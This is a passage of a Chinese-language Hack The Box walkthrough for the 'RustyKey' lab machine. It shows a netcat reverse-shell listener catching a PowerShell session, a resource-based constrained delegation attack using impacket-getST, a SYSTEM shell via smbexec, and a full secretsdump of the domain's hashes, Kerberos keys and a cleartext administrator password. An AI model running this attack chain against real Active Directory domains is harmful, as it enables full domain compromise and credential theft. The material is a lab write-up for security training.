┌──(root㉿kali)-[~]
└─# rlwrap nc -lnvp 4466
listening on [any] 4466 ...
connect to [10.10.14.46] from (UNKNOWN) [10.10.11.75] 57297

PS C:\Windows> whoami
rustykey\mm.turner
PS C:\Windows> 

Pasted image 20250701011626.png

2.6. RBCD

Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-getST -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin -dc-ip 10.10.11.75 -k 'rustykey.htb/IT-COMPUTER3$:Rusty88!'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache
┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# export KRB5CCNAME=backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccache

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# nxc smb dc.rustykey.htb -u backupadmin -k  --use-kcache 
SMB         dc.rustykey.htb 445    dc               [*]  x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc.rustykey.htb 445    dc               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)


┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-smbexec -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
c23d2704***********************

也可以导出ntds.dit

┌──(root㉿kali)-[~/Desktop/htb/season8/RustyKey]
└─# impacket-secretsdump -k -no-pass  'rustykey.htb/backupadmin@dc.rustykey.htb'  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword 
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM 
 0000   6A 34 14 2E FC 1A C2 54  64 E3 4C F1 A7 13 5F 34   j4.....Td.L..._4
 0010   79 98 16 81 90 47 A1 F0  8B FC 47 78 8C 7B 76 B6   y....G....Gx.{v.
 0020   C0 E4 94 9D 1E 15 A6 A9  70 2C 13 66 D7 23 A1 0B   ........p,.f.#..
 0030   F1 11 79 34 C1 8F 00 15  7B DF 6F C7 C3 B4 FC FE   ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:8432ec4c4f9b9ce96b73a6451a1d9dcc:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::
Support-Computer3$:1105:aad3b435b51404eeaad3b435b51404ee:43c00d56ff9545109c016bbfcbd32bee:::
Support-Computer4$:1106:aad3b435b51404eeaad3b435b51404ee:c52b0a68cb4e24e088164e2e5cf2b98a:::
Support-Computer5$:1107:aad3b435b51404eeaad3b435b51404ee:2f312c564ecde3769f981c5d5b32790a:::
Finance-Computer1$:1118:aad3b435b51404eeaad3b435b51404ee:d6a32714fa6c8b5e3ec89d4002adb495:::
Finance-Computer2$:1119:aad3b435b51404eeaad3b435b51404ee:49c0d9e13319c1cb199bc274ee14b04c:::
Finance-Computer3$:1120:aad3b435b51404eeaad3b435b51404ee:65f129254bea10ac4be71e453f6cabca:::
Finance-Computer4$:1121:aad3b435b51404eeaad3b435b51404ee:ace1db31d6aeb97059bf3efb410df72f:::
Finance-Computer5$:1122:aad3b435b51404eeaad3b435b51404ee:b53f4333805f80406b4513e60ef83457:::
IT-Computer1$:1123:aad3b435b51404eeaad3b435b51404ee:fe60afe8d9826130f0e06cd2958a8a61:::
IT-Computer2$:1124:aad3b435b51404eeaad3b435b51404ee:73d844e19c8df244c812d4be1ebcff80:::
IT-Computer3$:1125:aad3b435b51404eeaad3b435b51404ee:b52b582f02f8c0cd6320cd5eab36d9c6:::
IT-Computer4$:1126:aad3b435b51404eeaad3b435b51404ee:763f9ea340ccd5571c1ffabf88cac686:::
IT-Computer5$:1127:aad3b435b51404eeaad3b435b51404ee:1679431d1c52638688b4f1321da14045:::
[*] Kerberos keys grabbed
Administrator:des-cbc-md5:e007705d897310cd
krbtgt:aes256-cts-hmac-sha1-96:ee3271eb3f7047d423c8eeaf1bd84f4593f1f03ac999a3d7f3490921953d542a
krbtgt:aes128-cts-hmac-sha1-96:24465a36c2086d6d85df701553a428af
krbtgt:des-cbc-md5:d6d062fd1fd32a64
rustykey.htb\rr.parker:des-cbc-md5:8c5b3b54b9688aa1
rustykey.htb\mm.turner:aes256-cts-hmac-sha1-96:707ba49ed61c6575bfe9a3fd1541fc008e8803bfb0d7b5d21122cc464f39cbb9
rustykey.htb\mm.turner:aes128-cts-hmac-sha1-96:a252d2716a0b365649eaec02f84f12c8
rustykey.htb\mm.turner:des-cbc-md5:a46ea77c13854945
rustykey.htb\bb.morgan:des-cbc-md5:d6ef5e57a2abb93b
rustykey.htb\gg.anderson:des-cbc-md5:8923850da84f2c0d
rustykey.htb\dd.ali:des-cbc-md5:613da45e3bef34a7
rustykey.htb\ee.reed:des-cbc-md5:08e0862aec809ea8
rustykey.htb\nn.marcos:aes256-cts-hmac-sha1-96:53ee5251000622bf04e80b5a85a429107f8284d9fe1ff5560a20ec8626310ee8
rustykey.htb\nn.marcos:aes128-cts-hmac-sha1-96:cf00314169cb7fea67cfe8e0f7925a43
rustykey.htb\nn.marcos:des-cbc-md5:e358835b1c238661
rustykey.htb\backupadmin:des-cbc-md5:625e25fe70a77358
DC$:des-cbc-md5:915d9d52a762675d
Support-Computer1$:aes256-cts-hmac-sha1-96:89a52d7918588ddbdae5c4f053bbc180a41ed703a30c15c5d85d123457eba5fc
Support-Computer1$:aes128-cts-hmac-sha1-96:3a6188fdb03682184ff0d792a81dd203
Support-Computer1$:des-cbc-md5:c7cb8a76c76dfed9
Support-Computer2$:aes256-cts-hmac-sha1-96:50f8a3378f1d75df813db9d37099361a92e2f2fb8fcc0fc231fdd2856a005828
Support-Computer2$:aes128-cts-hmac-sha1-96:5c3fa5c32427fc819b10f9b9ea4be616
Support-Computer2$:des-cbc-md5:a2a202ec91e50b6d
Support-Computer3$:aes256-cts-hmac-sha1-96:e3b7b8876ac617dc7d2ba6cd2bea8de74db7acab2897525dfd284c43c8427954
Support-Computer3$:aes128-cts-hmac-sha1-96:1ea036e381f3279293489c19cfdeb6c1
Support-Computer3$:des-cbc-md5:c13edcfe4676f86d
Support-Computer4$:aes256-cts-hmac-sha1-96:1708c6a424ed59dedc60e980c8f2ab88f6e2bb1bfe92ec6971c8cf5a40e22c1e
Support-Computer4$:aes128-cts-hmac-sha1-96:9b6d33ef93c69721631b487dc00d3047
Support-Computer4$:des-cbc-md5:3b79647680e0d57a
Support-Computer5$:aes256-cts-hmac-sha1-96:464551486df4086accee00d3d37b60de581ee7adad2a6a31e3730fad3dfaed42
Support-Computer5$:aes128-cts-hmac-sha1-96:1ec0c93b7f9df69ff470e2e05ff4ba89
Support-Computer5$:des-cbc-md5:73abb53162d51fb3
Finance-Computer1$:aes256-cts-hmac-sha1-96:a57ce3a3e4ee34bc08c8538789fa6f99f5e8fb200a5f77741c5bf61b3d899918
Finance-Computer1$:aes128-cts-hmac-sha1-96:e62b7b772aba6668af65e9d1422e6aea
Finance-Computer1$:des-cbc-md5:d9914cf29e76f8df
Finance-Computer2$:aes256-cts-hmac-sha1-96:4d45b576dbd0eab6f4cc9dc75ff72bffe7fae7a2f9dc50b5418e71e8dc710703
Finance-Computer2$:aes128-cts-hmac-sha1-96:3fd0dd200120ca90b43af4ab4e344a78
Finance-Computer2$:des-cbc-md5:23ef512fb3a8d37c
Finance-Computer3$:aes256-cts-hmac-sha1-96:1b2280d711765eb64bdb5ab1f6b7a3134bc334a3661b3335f78dd590dee18b0d
Finance-Computer3$:aes128-cts-hmac-sha1-96:a25859c88f388ae7134b54ead8df7466
Finance-Computer3$:des-cbc-md5:2a688a43ab40ecba
Finance-Computer4$:aes256-cts-hmac-sha1-96:291adb0905f3e242748edd1c0ecaab34ca54675594b29356b90da62cf417496f
Finance-Computer4$:aes128-cts-hmac-sha1-96:81fed1f0eeada2f995ce05bbf7f8f951
Finance-Computer4$:des-cbc-md5:6b7532c83bc84c49
Finance-Computer5$:aes256-cts-hmac-sha1-96:6171c0240ae0ce313ecbd8ba946860c67903b12b77953e0ee38005744507e3de
Finance-Computer5$:aes128-cts-hmac-sha1-96:8e6aa26b24cdda2d7b5474b9a3dc94dc
Finance-Computer5$:des-cbc-md5:92a72f7f865bb6cd
IT-Computer1$:aes256-cts-hmac-sha1-96:61028ace6c840a6394517382823d6485583723f9c1f98097727ad3549d833b1e
IT-Computer1$:aes128-cts-hmac-sha1-96:7d1a98937cb221fee8fcf22f1a16b676
IT-Computer1$:des-cbc-md5:019d29370ece8002
IT-Computer2$:aes256-cts-hmac-sha1-96:e9472fb1cf77df86327e5775223cf3d152e97eebd569669a6b22280316cf86fa
IT-Computer2$:aes128-cts-hmac-sha1-96:a80fba15d78f66477f0591410a4ffda7
IT-Computer2$:des-cbc-md5:622f2ae961abe932
IT-Computer3$:aes256-cts-hmac-sha1-96:7871b89896813d9e4a732a35706fe44f26650c3da47e8db4f18b21cfbb7fbecb
IT-Computer3$:aes128-cts-hmac-sha1-96:0e14a9e6fd52ab14e36703c1a4c542e3
IT-Computer3$:des-cbc-md5:f7025180cd23e5f1
IT-Computer4$:aes256-cts-hmac-sha1-96:68f2e30ca6b60ec1ab75fab763087b8772485ee19a59996a27af41a498c57bbc
IT-Computer4$:aes128-cts-hmac-sha1-96:181ffb2653f2dc5974f2de924f0ac24a
IT-Computer4$:des-cbc-md5:bf58cb437340cd3d
IT-Computer5$:aes256-cts-hmac-sha1-96:417a87cdc95cb77997de6cdf07d8c9340626c7f1fbd6efabed86607e4cfd21b8
IT-Computer5$:aes128-cts-hmac-sha1-96:873fd89f24e79dcd0affe6f63c51ec9a
IT-Computer5$:des-cbc-md5:ad5eec6bcd4f86f7

Pasted image 20250701020800.png

3. BeyondRoot

3.1. SeDenyNetworkLogonRight

ee.read用户处于远程管理组但无法登录,原因在于其被SeDenyNetworkLogonRight 属性限制了

这个限制属于本地安全策略组策略(GPO)
你可以通过下面的方式查看

secedit /export /cfg C:\ProgramData\secpol.cfg
cat C:\ProgramData\secpol.cfg | select-string "SeDenyNetworkLogonRight"